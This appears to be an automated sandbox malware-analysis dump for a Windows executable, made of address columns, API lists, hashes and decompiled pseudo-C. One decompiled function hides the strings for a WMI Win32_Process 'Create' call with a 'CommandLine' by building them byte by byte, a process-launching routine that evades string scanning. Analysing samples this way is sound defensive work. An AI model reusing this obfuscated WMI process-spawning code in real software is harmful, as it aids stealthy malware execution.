                                                                                              0x004019c9
                                                                                              0x004019dd
                                                                                              0x004019e2
                                                                                              0x004019e4
                                                                                              0x004019e6
                                                                                              0x004019e9
                                                                                              0x00401a07
                                                                                              0x00401a0d
                                                                                              0x00401a14
                                                                                              0x00401a1d
                                                                                              0x00401a23
                                                                                              0x00000000
                                                                                              0x00401a23
                                                                                              0x004019eb
                                                                                              0x004019ed
                                                                                              0x004019f4
                                                                                              0x004019f4
                                                                                              0x004019f7
                                                                                              0x004019f7
                                                                                              0x004019f8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004019f0
                                                                                              0x004019f0
                                                                                              0x004019fa
                                                                                              0x004019ff
                                                                                              0x004019ff
                                                                                              0x00401a01
                                                                                              0x00000000
                                                                                              0x00401a01
                                                                                              0x004019bd
                                                                                              0x004017ac
                                                                                              0x00401664
                                                                                              0x0040166b
                                                                                              0x00401677
                                                                                              0x00401684

                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00401610
                                                                                              • VariantInit.OLEAUT32(?), ref: 0040163C
                                                                                              • VariantClear.OLEAUT32(?), ref: 0040166B
                                                                                              • SysFreeString.OLEAUT32(?), ref: 00401677
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 004016E7
                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 004016FC
                                                                                              • VariantCopy.OLEAUT32(?,00000000), ref: 00401782
                                                                                              • VariantClear.OLEAUT32(?), ref: 0040179D
                                                                                              • SafeArrayGetDim.OLEAUT32(?), ref: 004017B8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.271302047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.271298236.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271318755.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271325959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271331254.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearFreeString$ArrayCopyDecrementH_prolog3_InitInterlockedSafe
                                                                                              • String ID: $"$%$.$3$CloseHandle$CreateFileW$M$T$WriteFile$a$e$n$o$r$wsprintfW$x
                                                                                              • API String ID: 1476049567-3693484272
                                                                                              • Opcode ID: 0d1cc2d41d89a7bb200145b7d2b044b50bbb93111862f45cad3274b9208af472
                                                                                              • Instruction ID: 2e1bb9f1b69a140d73866221e4cf8314e14ee4db8b692837d57836f8d8dd8312
                                                                                              • Opcode Fuzzy Hash: 0d1cc2d41d89a7bb200145b7d2b044b50bbb93111862f45cad3274b9208af472
                                                                                              • Instruction Fuzzy Hash: 66C12B719012289FCB20DFA4CC8CB9EBBB9AB45304F1041EAE508B7261CB799EC5CF54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 28%
                                                                                              			E00401365(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				char _v4;
                                                                                              				char _v22;
                                                                                              				char _v23;
                                                                                              				char _v24;
                                                                                              				char _v25;
                                                                                              				char _v26;
                                                                                              				char _v27;
                                                                                              				char _v28;
                                                                                              				char _v31;
                                                                                              				char _v32;
                                                                                              				char _v33;
                                                                                              				char _v34;
                                                                                              				char _v35;
                                                                                              				char _v36;
                                                                                              				char _v37;
                                                                                              				char _v38;
                                                                                              				char _v39;
                                                                                              				char _v40;
                                                                                              				char _v41;
                                                                                              				char _v42;
                                                                                              				char _v43;
                                                                                              				char _v44;
                                                                                              				void* _v48;
                                                                                              				void* _v52;
                                                                                              				char _v56;
                                                                                              				char _v60;
                                                                                              				void* _v64;
                                                                                              				char _v68;
                                                                                              				void* _v72;
                                                                                              				char _v84;
                                                                                              				short _v92;
                                                                                              				void* _v96;
                                                                                              				char _v100;
                                                                                              				intOrPtr _v104;
                                                                                              				intOrPtr _v108;
                                                                                              				char _v112;
                                                                                              				intOrPtr _v116;
                                                                                              				intOrPtr _v120;
                                                                                              				intOrPtr _v124;
                                                                                              				intOrPtr _v128;
                                                                                              				intOrPtr _v132;
                                                                                              				char _v136;
                                                                                              				intOrPtr _v220;
                                                                                              				char _v224;
                                                                                              				signed int _t115;
                                                                                              				signed int _t118;
                                                                                              				void* _t121;
                                                                                              				signed int* _t125;
                                                                                              
                                                                                              				_t123 = __edi;
                                                                                              				_push(0x7c);
                                                                                              				E0040C7B1(E0040EE5C, __ebx, __edi, __esi);
                                                                                              				_push( &_v112);
                                                                                              				_t125 =  &_v56;
                                                                                              				_v112 = 0x746f6f72;
                                                                                              				_v108 = 0x6d69635c;
                                                                                              				_v104 = 0x3276;
                                                                                              				L7();
                                                                                              				_push(0);
                                                                                              				_push(0);
                                                                                              				_push(0);
                                                                                              				_push(3);
                                                                                              				_push(0);
                                                                                              				_push(0);
                                                                                              				_push(0);
                                                                                              				_push(0xffffffff);
                                                                                              				_push(0);
                                                                                              				_v4 = 0;
                                                                                              				if( *0x414378() < 0) {
                                                                                              					L17:
                                                                                              					__imp__#6(_v56);
                                                                                              					goto L33;
                                                                                              				} else {
                                                                                              					__eax =  &_v96;
                                                                                              					__eax =  *0x414380(0x410c4c, 0, 1, 0x410b7c,  &_v96);
                                                                                              					if( &_v96 < 0) {
                                                                                              						goto L17;
                                                                                              					} else {
                                                                                              						_v48 = 0;
                                                                                              						_push( &_v48);
                                                                                              						_push(0);
                                                                                              						_push(0);
                                                                                              						_push(0);
                                                                                              						_push(0);
                                                                                              						_push(0);
                                                                                              						_v4 = 1;
                                                                                              						__eax = _v96;
                                                                                              						__ecx =  *__eax;
                                                                                              						_push(0);
                                                                                              						_push(_v56);
                                                                                              						_push(__eax);
                                                                                              						if(__eax < 0) {
                                                                                              							L15:
                                                                                              							_v4 = __bl;
                                                                                              							__eax = _v48;
                                                                                              							if(__eax != __ebx) {
                                                                                              								__ecx =  *__eax;
                                                                                              								__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
                                                                                              							}
                                                                                              							goto L17;
                                                                                              						} else {
                                                                                              							_push(0);
                                                                                              							_push(0);
                                                                                              							_push(3);
                                                                                              							_push(3);
                                                                                              							_push(0);
                                                                                              							_push(0);
                                                                                              							_push(0xa);
                                                                                              							_push(_v48);
                                                                                              							if( *0x41437c() >= 0) {
                                                                                              								_v64 = 0;
                                                                                              								_v72 = 0;
                                                                                              								_v52 = 0;
                                                                                              								_v4 = 4;
                                                                                              								__eax =  &_v28;
                                                                                              								__esi =  &_v60;
                                                                                              								_v28 = 0x43;
                                                                                              								_v27 = 0x72;
                                                                                              								_v26 = 0x65;
                                                                                              								_v25 = 0x61;
                                                                                              								_v24 = 0x74;
                                                                                              								_v23 = 0x65;
                                                                                              								_v22 = __bl;
                                                                                              								_v44 = 0x57;
                                                                                              								_v43 = 0x69;
                                                                                              								_v42 = 0x6e;
                                                                                              								_v41 = 0x33;
                                                                                              								_v40 = 0x32;
                                                                                              								_v39 = 0x5f;
                                                                                              								_v38 = 0x50;
                                                                                              								_v37 = 0x72;
                                                                                              								_v36 = 0x6f;
                                                                                              								_v35 = 0x63;
                                                                                              								_v34 = 0x65;
                                                                                              								_v33 = 0x73;
                                                                                              								_v32 = 0x73;
                                                                                              								_v31 = __bl;
                                                                                              								L7();
                                                                                              								_t52 =  &_v44; // 0x57
                                                                                              								__eax = _t52;
                                                                                              								__esi =  &_v68;
                                                                                              								_v4 = 5;
                                                                                              								L7();
                                                                                              								_v4 = 6;
                                                                                              								__eax = _v48;
                                                                                              								__ecx =  *__eax;
                                                                                              								__eax =  *((intOrPtr*)( *__eax + 0x18))(__eax, _v68, 0, 0,  &_v64, 0, _t52,  &_v28);
                                                                                              								__eax = _v64;
                                                                                              								__ecx =  *__eax;
                                                                                              								__eax =  *((intOrPtr*)( *__eax + 0x4c))(__eax, _v60, 0,  &_v72, 0);
                                                                                              								__eax = _v72;
                                                                                              								__ecx =  *__eax;
                                                                                              								__eax =  *((intOrPtr*)( *__eax + 0x3c))(__eax, 0,  &_v52);
                                                                                              								__esi =  &_v100;
                                                                                              								L2();
                                                                                              								_v4 = 7;
                                                                                              								__esi = __imp__#9;
                                                                                              								__eax =  &_v92;
                                                                                              								_v92 = __bx;
                                                                                              								__eax =  *__esi( &_v92, 0x413f68);
                                                                                              								__edi = _v100;
                                                                                              								_v92 = 8;
                                                                                              								if(__edi != 0) {
                                                                                              									__imp__#149(__edi);
                                                                                              									__imp__#150(__edi, __eax);
                                                                                              								} else {
                                                                                              									__eax = 0;
                                                                                              								}
                                                                                              								_v84 = __eax;
                                                                                              								if(__eax != __ebx || __edi == __ebx) {
                                                                                              									_v4 = 8;
                                                                                              									__eax = _v52;
                                                                                              									_v136 = 0x6f0043;
                                                                                              									_v132 = 0x6d006d;
                                                                                              									_v128 = 0x6e0061;
                                                                                              									_v124 = 0x4c0064;
                                                                                              									_v120 = 0x6e0069;
                                                                                              									_v116 = 0x65;
                                                                                              									__ecx =  *__eax;
                                                                                              									__eax =  *((intOrPtr*)( *__eax + 0x14))(__eax,  &_v136, __ebx,  &_v92, __ebx);
                                                                                              									__eax = _v48;
                                                                                              									__ecx =  *__eax;
                                                                                              									__eax =  &_v92;
                                                                                              									__eax =  *__esi( &_v92, __eax, _v68, _v60, __ebx, __ebx, _v52, __ebx, __ebx);
                                                                                              									__esi = __imp__#6;
                                                                                              									__eax =  *__esi(__edi);
                                                                                              									__eax =  *__esi(_v68);
                                                                                              									__eax =  *__esi(_v60);
                                                                                              									_v4 = 3;
                                                                                              									__eax = _v52;
                                                                                              									if(__eax != __ebx) {
                                                                                              										__ecx =  *__eax;
                                                                                              										__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
                                                                                              									}
                                                                                              									_v4 = 2;
                                                                                              									__eax = _v72;
                                                                                              									if(__eax != __ebx) {
                                                                                              										__ecx =  *__eax;
                                                                                              										__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
                                                                                              									}
                                                                                              									_v4 = 1;
                                                                                              									__eax = _v64;
                                                                                              									if(__eax != __ebx) {
                                                                                              										__ecx =  *__eax;
                                                                                              										__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
                                                                                              									}
                                                                                              									_v4 = __bl;
                                                                                              									__eax = _v48;
                                                                                              									if(__eax != __ebx) {
                                                                                              										__ecx =  *__eax;
                                                                                              										__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
                                                                                              									}
                                                                                              									 *__esi(_v56) = 0;
                                                                                              									__eax = 1;
                                                                                              									L33:
                                                                                              									return E0040C7FB(0, _t123, _t125);
                                                                                              								} else {
                                                                                              									_v92 = 0xa;
                                                                                              									_v84 = 0x8007000e;
                                                                                              									_push(_t121);
                                                                                              									_v224 = 0x8007000e;
                                                                                              									_t115 = E0040363B( &_v224, 0x411668);
                                                                                              									asm("int3");
                                                                                              									if(_v220 != 0) {
                                                                                              										__imp__#2(_v220);
                                                                                              										 *_t125 = _t115;
                                                                                              										if(_t115 != 0) {
                                                                                              											goto L4;
                                                                                              										} else {
                                                                                              											L1();
                                                                                              											asm("int3");
                                                                                              											if(_v224 == 0) {
                                                                                              												L10:
                                                                                              												 *_t125 =  *_t125 & 0x00000000;
                                                                                              											} else {
                                                                                              												_t118 = E00401000(_t121, _v224);
                                                                                              												 *_t125 = _t118;
                                                                                              												if(_t118 == 0) {
                                                                                              													L1();
                                                                                              													goto L10;
                                                                                              												}
                                                                                              											}
                                                                                              											return _t125;
                                                                                              										}
                                                                                              									} else {
                                                                                              										 *_t125 =  *_t125 & 0x00000000;
                                                                                              										L4:
                                                                                              										return _t125;
                                                                                              									}
                                                                                              								}
                                                                                              							} else {
                                                                                              								goto L15;
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              			}



















































                                                                                              0x00401365
                                                                                              0x00401365
                                                                                              0x0040136c
                                                                                              0x00401374
                                                                                              0x00401375
                                                                                              0x00401378
                                                                                              0x0040137f
                                                                                              0x00401386
                                                                                              0x0040138d
                                                                                              0x00401394
                                                                                              0x00401395
                                                                                              0x00401396
                                                                                              0x00401397
                                                                                              0x00401399
                                                                                              0x0040139a
                                                                                              0x0040139b
                                                                                              0x0040139c
                                                                                              0x0040139e
                                                                                              0x0040139f
                                                                                              0x004013aa
                                                                                              0x0040140f
                                                                                              0x00401412
                                                                                              0x00000000
                                                                                              0x004013ac
                                                                                              0x004013ac
                                                                                              0x004013bd
                                                                                              0x004013c5
                                                                                              0x00000000
                                                                                              0x004013c7
                                                                                              0x004013c7
                                                                                              0x004013cd
                                                                                              0x004013ce
                                                                                              0x004013cf
                                                                                              0x004013d0
                                                                                              0x004013d1
                                                                                              0x004013d2
                                                                                              0x004013d3
                                                                                              0x004013d7
                                                                                              0x004013da
                                                                                              0x004013dc
                                                                                              0x004013dd
                                                                                              0x004013e0
                                                                                              0x004013e6
                                                                                              0x004013ff
                                                                                              0x004013ff
                                                                                              0x00401402
                                                                                              0x00401407
                                                                                              0x00401409
                                                                                              0x0040140c
                                                                                              0x0040140c
                                                                                              0x00000000
                                                                                              0x004013e8
                                                                                              0x004013e8
                                                                                              0x004013e9
                                                                                              0x004013ea
                                                                                              0x004013ec
                                                                                              0x004013ee
                                                                                              0x004013ef
                                                                                              0x004013f0
                                                                                              0x004013f2
                                                                                              0x004013fd
                                                                                              0x0040141f
                                                                                              0x00401422
                                                                                              0x00401425
                                                                                              0x00401428
                                                                                              0x0040142c
                                                                                              0x00401430
                                                                                              0x00401433
                                                                                              0x00401437
                                                                                              0x0040143b
                                                                                              0x0040143f
                                                                                              0x00401443
                                                                                              0x00401447
                                                                                              0x0040144b
                                                                                              0x0040144e
                                                                                              0x00401452
                                                                                              0x00401456
                                                                                              0x0040145a
                                                                                              0x0040145e
                                                                                              0x00401462
                                                                                              0x00401466
                                                                                              0x0040146a
                                                                                              0x0040146e
                                                                                              0x00401472
                                                                                              0x00401476
                                                                                              0x0040147a
                                                                                              0x0040147e
                                                                                              0x00401482
                                                                                              0x00401485
                                                                                              0x0040148a
                                                                                              0x0040148a
                                                                                              0x0040148e
                                                                                              0x00401491
                                                                                              0x00401495
                                                                                              0x004014a0
                                                                                              0x004014a4
                                                                                              0x004014a7
                                                                                              0x004014ae
                                                                                              0x004014b1
                                                                                              0x004014b4
                                                                                              0x004014c0
                                                                                              0x004014c3
                                                                                              0x004014c6
                                                                                              0x004014ce
                                                                                              0x004014d6
                                                                                              0x004014d9
                                                                                              0x004014de
                                                                                              0x004014e2
                                                                                              0x004014e8
                                                                                              0x004014ec
                                                                                              0x004014f0
                                                                                              0x004014f2
                                                                                              0x004014f7
                                                                                              0x004014fd
                                                                                              0x00401504
                                                                                              0x0040150c
                                                                                              0x004014ff
                                                                                              0x004014ff
                                                                                              0x004014ff
                                                                                              0x00401514
                                                                                              0x00401517
                                                                                              0x00401530
                                                                                              0x00401534
                                                                                              0x00401543
                                                                                              0x0040154d
                                                                                              0x00401557
                                                                                              0x0040155e
                                                                                              0x00401565
                                                                                              0x0040156c
                                                                                              0x00401573
                                                                                              0x00401576
                                                                                              0x00401579
                                                                                              0x0040157c
                                                                                              0x0040158f
                                                                                              0x00401593
                                                                                              0x00401595
                                                                                              0x0040159c
                                                                                              0x004015a1
                                                                                              0x004015a6
                                                                                              0x004015a8
                                                                                              0x004015ac
                                                                                              0x004015b1
                                                                                              0x004015b3
                                                                                              0x004015b6
                                                                                              0x004015b6
                                                                                              0x004015b9
                                                                                              0x004015bd
                                                                                              0x004015c2
                                                                                              0x004015c4
                                                                                              0x004015c7
                                                                                              0x004015c7
                                                                                              0x004015ca
                                                                                              0x004015ce
                                                                                              0x004015d3
                                                                                              0x004015d5
                                                                                              0x004015d8
                                                                                              0x004015d8
                                                                                              0x004015db
                                                                                              0x004015de
                                                                                              0x004015e3
                                                                                              0x004015e5
                                                                                              0x004015e8
                                                                                              0x004015e8
                                                                                              0x004015f0
                                                                                              0x004015f2
                                                                                              0x004015f3
                                                                                              0x004015f8
                                                                                              0x0040151d
                                                                                              0x0040151d
                                                                                              0x00401523
                                                                                              0x00401066
                                                                                              0x00401070
                                                                                              0x00401077
                                                                                              0x0040107c
                                                                                              0x00401082
                                                                                              0x00401090
                                                                                              0x00401098
                                                                                              0x0040109a
                                                                                              0x00000000
                                                                                              0x0040109c
                                                                                              0x0040109c
                                                                                              0x004010a1
                                                                                              0x004010a7
                                                                                              0x004010be
                                                                                              0x004010be
                                                                                              0x004010a9
                                                                                              0x004010ad
                                                                                              0x004010b5
                                                                                              0x004010b7
                                                                                              0x004010b9
                                                                                              0x00000000
                                                                                              0x004010b9
                                                                                              0x004010b7
                                                                                              0x004010c3
                                                                                              0x004010c3
                                                                                              0x00401084
                                                                                              0x00401084
                                                                                              0x00401087
                                                                                              0x00401089
                                                                                              0x00401089
                                                                                              0x00401082
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004013fd
                                                                                              0x004013e6
                                                                                              0x004013c5

                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 0040136C
                                                                                              • SysFreeString.OLEAUT32(?), ref: 00401412
                                                                                              • VariantClear.OLEAUT32(?), ref: 004014F0
                                                                                              • SysStringByteLen.OLEAUT32(?), ref: 00401504
                                                                                              • SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 0040150C
                                                                                              • VariantClear.OLEAUT32(00000008), ref: 00401593
                                                                                              • SysFreeString.OLEAUT32(?), ref: 0040159C
                                                                                              • SysFreeString.OLEAUT32(?), ref: 004015A1
                                                                                              • SysFreeString.OLEAUT32(?), ref: 004015A6
                                                                                              • SysFreeString.OLEAUT32(?), ref: 004015EE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.271302047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.271298236.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271318755.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271325959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271331254.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: String$Free$ByteClearVariant$AllocH_prolog3_
                                                                                              • String ID: C$C$Win32_Process$\cim$a$a$d$e$e$e$i$m$r$root$t$v2
                                                                                              • API String ID: 2755584266-2892963168
                                                                                              • Opcode ID: 9e7bc087bd621754af4a2e05d50593d3e21ab6d4c9f47adb05423cfd956e701d
                                                                                              • Instruction ID: 2f9e2f7884c7298f98689c3486476241e389c07babe4f58a3cc526eb99a57f62
                                                                                              • Opcode Fuzzy Hash: 9e7bc087bd621754af4a2e05d50593d3e21ab6d4c9f47adb05423cfd956e701d
                                                                                              • Instruction Fuzzy Hash: 6E91F971D0428CEFDF01DBE4CC88A9EBBBAAF49308F144069E145BB291C7795E49CB65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 91%
                                                                                              			E00405AEC(void* __ebx) {
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				_Unknown_base(*)()* _t7;
                                                                                              				long _t10;
                                                                                              				void* _t11;
                                                                                              				int _t12;
                                                                                              				void* _t18;
                                                                                              				intOrPtr _t21;
                                                                                              				long _t26;
                                                                                              				void* _t30;
                                                                                              				struct HINSTANCE__* _t37;
                                                                                              				void* _t40;
                                                                                              				void* _t42;
                                                                                              
                                                                                              				_t30 = __ebx;
                                                                                              				_t37 = GetModuleHandleA("KERNEL32.DLL");
                                                                                              				if(_t37 != 0) {
                                                                                              					 *0x413dac = GetProcAddress(_t37, "FlsAlloc");
                                                                                              					 *0x413db0 = GetProcAddress(_t37, "FlsGetValue");
                                                                                              					 *0x413db4 = GetProcAddress(_t37, "FlsSetValue");
                                                                                              					_t7 = GetProcAddress(_t37, "FlsFree");
                                                                                              					__eflags =  *0x413dac;
                                                                                              					_t40 = TlsSetValue;
                                                                                              					 *0x413db8 = _t7;
                                                                                              					if( *0x413dac == 0) {
                                                                                              						L6:
                                                                                              						 *0x413db0 = TlsGetValue;
                                                                                              						 *0x413dac = E0040580C;
                                                                                              						 *0x413db4 = _t40;
                                                                                              						 *0x413db8 = TlsFree;
                                                                                              					} else {
                                                                                              						__eflags =  *0x413db0;
                                                                                              						if( *0x413db0 == 0) {
                                                                                              							goto L6;
                                                                                              						} else {
                                                                                              							__eflags =  *0x413db4;
                                                                                              							if( *0x413db4 == 0) {
                                                                                              								goto L6;
                                                                                              							} else {
                                                                                              								__eflags = _t7;
                                                                                              								if(_t7 == 0) {
                                                                                              									goto L6;
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              					_t10 = TlsAlloc();
                                                                                              					__eflags = _t10 - 0xffffffff;
                                                                                              					 *0x41271c = _t10;
                                                                                              					if(_t10 == 0xffffffff) {
                                                                                              						L15:
                                                                                              						_t11 = 0;
                                                                                              						__eflags = 0;
                                                                                              					} else {
                                                                                              						_t12 = TlsSetValue(_t10,  *0x413db0);
                                                                                              						__eflags = _t12;
                                                                                              						if(_t12 == 0) {
                                                                                              							goto L15;
                                                                                              						} else {
                                                                                              							E00404C4F();
                                                                                              							 *0x413dac = E0040573D( *0x413dac);
                                                                                              							 *0x413db0 = E0040573D( *0x413db0);
                                                                                              							 *0x413db4 = E0040573D( *0x413db4);
                                                                                              							 *0x413db8 = E0040573D( *0x413db8);
                                                                                              							_t18 = E00402436();
                                                                                              							__eflags = _t18;
                                                                                              							if(_t18 == 0) {
                                                                                              								L14:
                                                                                              								E0040583F();
                                                                                              								goto L15;
                                                                                              							} else {
                                                                                              								_push(E004059CB);
                                                                                              								_t21 =  *((intOrPtr*)(E004057A9( *0x413dac)))();
                                                                                              								__eflags = _t21 - 0xffffffff;
                                                                                              								 *0x412718 = _t21;
                                                                                              								if(_t21 == 0xffffffff) {
                                                                                              									goto L14;
                                                                                              								} else {
                                                                                              									_t42 = E00405E2B(1, 0x214);
                                                                                              									__eflags = _t42;
                                                                                              									if(_t42 == 0) {
                                                                                              										goto L14;
                                                                                              									} else {
                                                                                              										_push(_t42);
                                                                                              										_push( *0x412718);
                                                                                              										__eflags =  *((intOrPtr*)(E004057A9( *0x413db4)))();
                                                                                              										if(__eflags == 0) {
                                                                                              											goto L14;
                                                                                              										} else {
                                                                                              											_push(0);
                                                                                              											_push(_t42);
                                                                                              											E0040587C(_t30, _t37, _t42, __eflags);
                                                                                              											_t26 = GetCurrentThreadId();
                                                                                              											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                                                                              											 *_t42 = _t26;
                                                                                              											_t11 = 1;
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              					return _t11;
                                                                                              				} else {
                                                                                              					E0040583F();
                                                                                              					return 0;
                                                                                              				}
                                                                                              			}
















                                                                                              0x00405aec
                                                                                              0x00405af8
                                                                                              0x00405afc
                                                                                              0x00405b1c
                                                                                              0x00405b29
                                                                                              0x00405b36
                                                                                              0x00405b3b
                                                                                              0x00405b3d
                                                                                              0x00405b44
                                                                                              0x00405b4a
                                                                                              0x00405b4f
                                                                                              0x00405b67
                                                                                              0x00405b6c
                                                                                              0x00405b76
                                                                                              0x00405b80
                                                                                              0x00405b86
                                                                                              0x00405b51
                                                                                              0x00405b51
                                                                                              0x00405b58
                                                                                              0x00000000
                                                                                              0x00405b5a
                                                                                              0x00405b5a
                                                                                              0x00405b61
                                                                                              0x00000000
                                                                                              0x00405b63
                                                                                              0x00405b63
                                                                                              0x00405b65
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405b65
                                                                                              0x00405b61
                                                                                              0x00405b58
                                                                                              0x00405b8b
                                                                                              0x00405b91
                                                                                              0x00405b94
                                                                                              0x00405b99
                                                                                              0x00405c6b
                                                                                              0x00405c6b
                                                                                              0x00405c6b
                                                                                              0x00405b9f
                                                                                              0x00405ba6
                                                                                              0x00405ba8
                                                                                              0x00405baa
                                                                                              0x00000000
                                                                                              0x00405bb0
                                                                                              0x00405bb0
                                                                                              0x00405bc6
                                                                                              0x00405bd6
                                                                                              0x00405be6
                                                                                              0x00405bf3
                                                                                              0x00405bf8
                                                                                              0x00405bfd
                                                                                              0x00405bff
                                                                                              0x00405c66
                                                                                              0x00405c66
                                                                                              0x00000000
                                                                                              0x00405c01
                                                                                              0x00405c01
                                                                                              0x00405c12
                                                                                              0x00405c14
                                                                                              0x00405c17
                                                                                              0x00405c1c
                                                                                              0x00000000
                                                                                              0x00405c1e
                                                                                              0x00405c2a
                                                                                              0x00405c2c
                                                                                              0x00405c30
                                                                                              0x00000000
                                                                                              0x00405c32
                                                                                              0x00405c32
                                                                                              0x00405c33
                                                                                              0x00405c47
                                                                                              0x00405c49
                                                                                              0x00000000
                                                                                              0x00405c4b
                                                                                              0x00405c4b
                                                                                              0x00405c4d
                                                                                              0x00405c4e
                                                                                              0x00405c55
                                                                                              0x00405c5b
                                                                                              0x00405c5f
                                                                                              0x00405c63
                                                                                              0x00405c63
                                                                                              0x00405c49
                                                                                              0x00405c30
                                                                                              0x00405c1c
                                                                                              0x00405bff
                                                                                              0x00405baa
                                                                                              0x00405c6f
                                                                                              0x00405afe
                                                                                              0x00405afe
                                                                                              0x00405b06
                                                                                              0x00405b06

                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,00402112), ref: 00405AF2
                                                                                              • __mtterm.LIBCMT ref: 00405AFE
                                                                                                • Part of subcall function 0040583F: __decode_pointer.LIBCMT ref: 00405850
                                                                                                • Part of subcall function 0040583F: TlsFree.KERNEL32(00000005,00405C6B), ref: 0040586A
                                                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00405B14
                                                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00405B21
                                                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00405B2E
                                                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00405B3B
                                                                                              • TlsAlloc.KERNEL32 ref: 00405B8B
                                                                                              • TlsSetValue.KERNEL32(00000000), ref: 00405BA6
                                                                                              • __init_pointers.LIBCMT ref: 00405BB0
                                                                                              • __encode_pointer.LIBCMT ref: 00405BBB
                                                                                              • __encode_pointer.LIBCMT ref: 00405BCB
                                                                                              • __encode_pointer.LIBCMT ref: 00405BDB
                                                                                              • __encode_pointer.LIBCMT ref: 00405BEB
                                                                                              • __decode_pointer.LIBCMT ref: 00405C0C
                                                                                              • __calloc_crt.LIBCMT ref: 00405C25
                                                                                              • __decode_pointer.LIBCMT ref: 00405C3F
                                                                                              • __initptd.LIBCMT ref: 00405C4E
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00405C55
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.271302047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.271298236.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271318755.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271325959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271331254.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                              • API String ID: 2657569430-3819984048
                                                                                              • Opcode ID: 932b1a9841ad698d27ab752f2a7c97f39a9e3a1ec2abbc12df6f586e70533816
                                                                                              • Instruction ID: 62730ed6d29453220e92eb90e4f6b398bee8ae5759b9cd74ad339ae71e198d7c
                                                                                              • Opcode Fuzzy Hash: 932b1a9841ad698d27ab752f2a7c97f39a9e3a1ec2abbc12df6f586e70533816
                                                                                              • Instruction Fuzzy Hash: 9E317A71904B009ADB60AF75BE49AC73AB4EB41366F14857BE400F32E5EB788648CF5C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 59%
                                                                                              			E00401A7C(void* __ebx, void* __edi) {
                                                                                              				signed int _v8;
                                                                                              				signed int _v12;
                                                                                              				char _v532;
                                                                                              				signed int _v536;
                                                                                              				intOrPtr _v540;
                                                                                              				char _v544;
                                                                                              				intOrPtr _v548;
                                                                                              				intOrPtr _v552;
                                                                                              				intOrPtr _v556;
                                                                                              				intOrPtr _v560;
                                                                                              				intOrPtr _v564;
                                                                                              				intOrPtr _v568;
                                                                                              				intOrPtr _v572;
                                                                                              				intOrPtr _v576;
                                                                                              				intOrPtr _v580;
                                                                                              				intOrPtr _v584;
                                                                                              				intOrPtr _v588;
                                                                                              				intOrPtr _v592;
                                                                                              				char _v596;
                                                                                              				intOrPtr _v600;
